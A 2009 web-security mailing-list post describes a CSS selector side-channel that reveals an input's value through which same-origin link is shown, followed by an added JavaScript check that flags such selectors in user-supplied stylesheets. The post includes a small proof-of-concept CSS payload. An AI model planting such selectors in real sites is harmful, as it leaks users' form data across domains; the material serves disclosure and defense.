Same origin CSS selector attacks

From: gaz Heyes <gazheyes@gmail.com>
Date: Thu, 10 Dec 2009 09:27:37 +0000
Message-ID: <252dd75b0912100127u5de51e6ob711a8e7b7dfd99e@mail.gmail.com>
To: public-web-security@w3.org

Hi All,

Another attack vector not discussed is to use same-origin URLs to gather
data of HTML values. If you can use a reference to a URL on the same site
and influence part of its value then you can use that data.
So let's say a site allows selectors, display and a normal <a href> (same
origin) link.

Then you can do:
<style>
/* Hide every link by default. */
a {
    display:none;
}
/* Each rule reveals a different link only when the input's value contains
   the probed fragment; here the value contains "cd1", so only the second
   link (two siblings after the input) becomes visible. */
input[value*="ab1"] + a {
    display:block;
}
input[value*="cd1"] + a + a {
    display:block;
}
input[value*="ef1"] + a + a + a {
    display:block;
}
</style>

<input value="cd1xxx" />
<a href="#ab1">ab1</a>
<a href="#cd1">cd1</a>
<a href="#ef1">ef1</a>

This data can be gathered from any site at any point as long as the history
hasn't been cleared. This obviously isn't going to work for brute-forcing
tokens but could be used for simple information disclosure across domains.
Received on Thursday, 10 December 2009 09:28:18 GMT
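A defender-side check, added here as an example and not part of the post: it scans a user-supplied stylesheet for the prefix, suffix and substring attribute selectors the post relies on, so a site that lets users supply selectors can reject such rules before serving the CSS. The function names and the sample stylesheet are constructed for this example.

```javascript
// Added example (not from the post): flag CSS attribute selectors that test
// part of an attribute's contents, the primitive used to read an input's
// value one fragment at a time.

// One attribute selector, e.g. [value*="ab1"]: captures name, operator, needle.
const ATTR_SELECTOR =
  /\[\s*([\w-]+)\s*(?:([*^$~|]?=)\s*(?:"([^"]*)"|'([^']*)'|([^\]\s]+)))?\s*\]/g;
// Operators that match a fragment of a value. "=" is an exact match and
// "~=" / "|=" match whole tokens, so they are not flagged here.
const PARTIAL_OPERATORS = new Set(['*=', '^=', '$=']);

function stripComments(css) {
  return css.replace(/\/\*[\s\S]*?\*\//g, '');
}

// Returns every selector in `css` that uses a prefix/suffix/substring
// attribute match, with the attribute probed and the needle tested.
// Selector lists are split on commas (a comma inside a quoted attribute
// value is not handled by this simple splitter).
function findAttributeProbes(css) {
  const clean = stripComments(css);
  const findings = [];
  const selectorBlock = /([^{};]+)\{/g; // text that precedes each '{'
  let block;
  while ((block = selectorBlock.exec(clean)) !== null) {
    for (const selector of block[1].split(',')) {
      const text = selector.trim();
      ATTR_SELECTOR.lastIndex = 0;
      let m;
      while ((m = ATTR_SELECTOR.exec(text)) !== null) {
        const [, attribute, operator, dq, sq, bare] = m;
        if (PARTIAL_OPERATORS.has(operator)) {
          findings.push({ selector: text, attribute, operator, needle: dq ?? sq ?? bare });
        }
      }
    }
  }
  return findings;
}

// Constructed sample: the stylesheet from the post plus one benign rule.
const SAMPLE_CSS = `
a { display:none; }
input[value*="ab1"] + a { display:block; }
input[value*="cd1"] + a + a { display:block; }
input[value*="ef1"] + a + a + a { display:block; }
input[type="text"] { border: 1px solid #ccc; }
`;

console.log(findAttributeProbes(SAMPLE_CSS)); // three findings, all on "value" with "*="
```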
